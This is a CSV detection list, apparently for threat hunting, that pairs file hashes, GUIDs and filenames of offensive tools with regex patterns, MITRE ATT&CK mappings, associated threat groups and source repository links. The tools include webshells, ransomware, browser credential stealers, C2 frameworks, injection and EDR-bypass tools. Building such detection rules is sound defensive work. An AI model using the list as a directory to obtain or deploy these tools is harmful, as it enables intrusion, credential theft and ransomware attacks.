"*d16d7eaa9f5abcafb83da10a9b729f7c9b090bf209fd7b9ea820ed942c328d60*",".{0,1000}d16d7eaa9f5abcafb83da10a9b729f7c9b090bf209fd7b9ea820ed942c328d60.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","39439"
"*d16e708e00f1d0138dea021571eed4ff2f2271ce937cd04adce602bbff805b8a*",".{0,1000}d16e708e00f1d0138dea021571eed4ff2f2271ce937cd04adce602bbff805b8a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39440"
"*d172875534019a0aeebe70a021121ed7b5a21765d6d24838b5c639a1def0d59c*",".{0,1000}d172875534019a0aeebe70a021121ed7b5a21765d6d24838b5c639a1def0d59c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39442"
"*d18597195b9b81b9e401547e4b630acf09ad39401bdcc8b5fa2e05e4677cf46f*",".{0,1000}d18597195b9b81b9e401547e4b630acf09ad39401bdcc8b5fa2e05e4677cf46f.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","39443"
"*d18b648dfee767e09a9c580a9bd0c60edc5f9aa4718e41c15434c47630023efb*",".{0,1000}d18b648dfee767e09a9c580a9bd0c60edc5f9aa4718e41c15434c47630023efb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39444"
"*d18c5c837e4bdfb76b6c4e6fa7ad0d6e583eec0cadf8184cd9297c77813337c2*",".{0,1000}d18c5c837e4bdfb76b6c4e6fa7ad0d6e583eec0cadf8184cd9297c77813337c2.{0,1000}","offensive_tool_keyword","Dispossessor","script used to install anydesk by the Dispossessor group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","39446"
"*d18e9a06ca8ad06c8b7178a31b1c6375031e75f08f3fb346a5fee42e2517ab88*",".{0,1000}d18e9a06ca8ad06c8b7178a31b1c6375031e75f08f3fb346a5fee42e2517ab88.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","39447"
"*d18fa52fdb740b1bbad14af154bffdd03ce7afadecf3df35b13e28a535f62067*",".{0,1000}d18fa52fdb740b1bbad14af154bffdd03ce7afadecf3df35b13e28a535f62067.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39448"
"*d19415ba5aa5fcb87bcf4c3185e5ccaf0da896ed49495ce5297d89e8ad7988e4*",".{0,1000}d19415ba5aa5fcb87bcf4c3185e5ccaf0da896ed49495ce5297d89e8ad7988e4.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","39451"
"*D19BD978-267A-4BF0-85CC-851E280FF4C2*",".{0,1000}D19BD978\-267A\-4BF0\-85CC\-851E280FF4C2.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","39453"
"*d1ac1450eece96c89d0721fb21e39d299b4157ea35b2d4ed8b91fbc766974101*",".{0,1000}d1ac1450eece96c89d0721fb21e39d299b4157ea35b2d4ed8b91fbc766974101.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","39456"
"*D1AE1ACF-8AA2-4935-ACDF-EC22BAE2DF76*",".{0,1000}D1AE1ACF\-8AA2\-4935\-ACDF\-EC22BAE2DF76.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","#GUIDproject","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","39457"
"*d1b397d550d1f9921048c02b3401aeeaa070c99e5c369738834e01a6100c5396*",".{0,1000}d1b397d550d1f9921048c02b3401aeeaa070c99e5c369738834e01a6100c5396.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39458"
"*d1b43d39823d14ec9524f63fa0125ad9606d5c3e32d8e10d34a25214c56d308f*",".{0,1000}d1b43d39823d14ec9524f63fa0125ad9606d5c3e32d8e10d34a25214c56d308f.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#filehash","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","39459"
"*d1b7993dc84243e12f8b4650de9b71a85f5a3751c085d96f7211129c5e5f4eb0*",".{0,1000}d1b7993dc84243e12f8b4650de9b71a85f5a3751c085d96f7211129c5e5f4eb0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39461"
"*d1b8e13cf05c57e811ee4c90c985c018a7d1e937eca0f5860fecf36601032630*",".{0,1000}d1b8e13cf05c57e811ee4c90c985c018a7d1e937eca0f5860fecf36601032630.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39462"
"*D1C2F2133FF88AEE3A302ABB828198F12C075847297604D3A1AF8CD5E91645B5*",".{0,1000}D1C2F2133FF88AEE3A302ABB828198F12C075847297604D3A1AF8CD5E91645B5.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","39463"
"*d1c7ff29ca273c6d90c5607f57a7788c3f5e569bc2c2863edcde5f2653bbde81*",".{0,1000}d1c7ff29ca273c6d90c5607f57a7788c3f5e569bc2c2863edcde5f2653bbde81.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39465"
"*D1CCDA5D-E460-4ACC-B51A-730DE8F0ECF3*",".{0,1000}D1CCDA5D\-E460\-4ACC\-B51A\-730DE8F0ECF3.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","39466"
"*d1cd42f8663905f5e307c82b421093d7eb93b2d2a8d50f752ff0b8628b2bbc5a*",".{0,1000}d1cd42f8663905f5e307c82b421093d7eb93b2d2a8d50f752ff0b8628b2bbc5a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39467"
"*d1d106fb03d4ce0018b4a6fe470cf3e9f5428de54f9e3cfeb3b7a20be498869f*",".{0,1000}d1d106fb03d4ce0018b4a6fe470cf3e9f5428de54f9e3cfeb3b7a20be498869f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39468"
"*D1D4BB1C-798D-47B0-8525-061D40CB9E44*",".{0,1000}D1D4BB1C\-798D\-47B0\-8525\-061D40CB9E44.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#GUIDProject","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","39469"
"*d1d4d168eeedd0867537ba4cf5befd1ea7adab62843d21088e6c51e27dec34c5*",".{0,1000}d1d4d168eeedd0867537ba4cf5befd1ea7adab62843d21088e6c51e27dec34c5.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","#filehash","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","39470"
"*d1d533085ee36aee9b817636d6ed5323da22461af7de88b016484610531c6f0e*",".{0,1000}d1d533085ee36aee9b817636d6ed5323da22461af7de88b016484610531c6f0e.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","39471"
"*d1d579c00e86fb281fe7dab503014ecdf9777d85bd9ce50b079a221f344c0ab9*",".{0,1000}d1d579c00e86fb281fe7dab503014ecdf9777d85bd9ce50b079a221f344c0ab9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39472"
"*d1d6193bb15e21797e9e976ffb5aff8f8edc4fc90cccb4667fcf0cb168073ae8*",".{0,1000}d1d6193bb15e21797e9e976ffb5aff8f8edc4fc90cccb4667fcf0cb168073ae8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39474"
"*d1d808c69e803b797745a4bd963e44aa1f0ec16edbc721114867d9ef02f0a94d*",".{0,1000}d1d808c69e803b797745a4bd963e44aa1f0ec16edbc721114867d9ef02f0a94d.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","39475"
"*d1d8362d21a381b0703d4586b73ce78d5332507c62e1d90eb8eb83555db1d6c8*",".{0,1000}d1d8362d21a381b0703d4586b73ce78d5332507c62e1d90eb8eb83555db1d6c8.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","#filehash","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","39476"
"*d1e05f79d0b0643b230fbbde69607d9ce4f20b8f19a8c47a91bf8beeb50ea147*",".{0,1000}d1e05f79d0b0643b230fbbde69607d9ce4f20b8f19a8c47a91bf8beeb50ea147.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39478"
"*d1e9bbf0fb621285de6ea7b4c2b3f8dc2a15d0e51639eafb8f2fb8aca47054e0*",".{0,1000}d1e9bbf0fb621285de6ea7b4c2b3f8dc2a15d0e51639eafb8f2fb8aca47054e0.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","39479"
"*d1ecd1c7f986326c33be2f9d183e60855e769cfa763f94906c04deddb3d78756*",".{0,1000}d1ecd1c7f986326c33be2f9d183e60855e769cfa763f94906c04deddb3d78756.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39480"
"*d1efc8919bbb55ea144e8b91203a43cec5ceda5ae68f1077836e1da06340f557*",".{0,1000}d1efc8919bbb55ea144e8b91203a43cec5ceda5ae68f1077836e1da06340f557.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","39481"
"*d1f2f22cdf96f4a71b8a859353a8ff4a27d4afd8f8849da5d6eed966c1cc72d3*",".{0,1000}d1f2f22cdf96f4a71b8a859353a8ff4a27d4afd8f8849da5d6eed966c1cc72d3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39482"
"*d1f5e8ada7197e67b7bdede4827104e286c63f24407bb9eef80cc7c2bd2e065f*",".{0,1000}d1f5e8ada7197e67b7bdede4827104e286c63f24407bb9eef80cc7c2bd2e065f.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","#filehash","N/A","6","","N/A","","","","39483"
"*d1f920a20dd3f630ec10f55c318d860023ec40d74545cc490479ea503583e0df*",".{0,1000}d1f920a20dd3f630ec10f55c318d860023ec40d74545cc490479ea503583e0df.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","39484"
"*d1fb14a96b35b807b6b2315bc198b778f0ced472685c708d757a5219ae06bba1*",".{0,1000}d1fb14a96b35b807b6b2315bc198b778f0ced472685c708d757a5219ae06bba1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39485"
"*d1fb9e6003ccd810b6df1b2160dbbf6ab8b6daf81c4cbde95a31add2661a59e2*",".{0,1000}d1fb9e6003ccd810b6df1b2160dbbf6ab8b6daf81c4cbde95a31add2661a59e2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39486"
"*d1fccb8acadbdefaf27f8680c74c40dba94e52734dd9704d38c0de7b10066f14*",".{0,1000}d1fccb8acadbdefaf27f8680c74c40dba94e52734dd9704d38c0de7b10066f14.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","#filehash","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","39487"
"*D1rkInject.cpp*",".{0,1000}D1rkInject\.cpp.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","39488"
"*D1rkInject.exe*",".{0,1000}D1rkInject\.exe.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","39489"
"*D1rkInject.iobj*",".{0,1000}D1rkInject\.iobj.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","39490"
"*D1rkInject.log*",".{0,1000}D1rkInject\.log.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","#logfile","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","39491"
"*D1rkInject.sln*",".{0,1000}D1rkInject\.sln.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","39492"
"*D1rkInject.vcxproj*",".{0,1000}D1rkInject\.vcxproj.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","39493"
"*D1rkInject-main*",".{0,1000}D1rkInject\-main.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","39494"
"*d201ba52fb577509eefe1e9e780fdcc45776a746ac6dbf913a315b34eb2134c7*",".{0,1000}d201ba52fb577509eefe1e9e780fdcc45776a746ac6dbf913a315b34eb2134c7.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","39495"
"*d2053465e2b96e8fb144090dd3cb1b7d02c1364f0d66eae234995c89c2f57c64*",".{0,1000}d2053465e2b96e8fb144090dd3cb1b7d02c1364f0d66eae234995c89c2f57c64.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39496"
"*D210570B-F1A0-4B66-9301-F7A54978C178*",".{0,1000}D210570B\-F1A0\-4B66\-9301\-F7A54978C178.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","#GUIDproject","N/A","10","1","49","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z","39498"
"*d2119d9dce199cab558514bb1de19a59b207a9d654d0ed1477fa2d98f20e3dc3*",".{0,1000}d2119d9dce199cab558514bb1de19a59b207a9d654d0ed1477fa2d98f20e3dc3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39499"
"*d21cccc6cb3f8313098da5b7ad6a37b5349835a702b5caf8e794a7c6903f40c5*",".{0,1000}d21cccc6cb3f8313098da5b7ad6a37b5349835a702b5caf8e794a7c6903f40c5.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","39503"
"*d21cf671b3547b844a9adbe858c032e02f68b5d475de06b92e7776cd79d9db27*",".{0,1000}d21cf671b3547b844a9adbe858c032e02f68b5d475de06b92e7776cd79d9db27.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","39504"
"*d21f5b2cbd06f1f679bcc65b7d40fc203c1f7008dac678f7edf14577d8c2246f*",".{0,1000}d21f5b2cbd06f1f679bcc65b7d40fc203c1f7008dac678f7edf14577d8c2246f.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","39505"
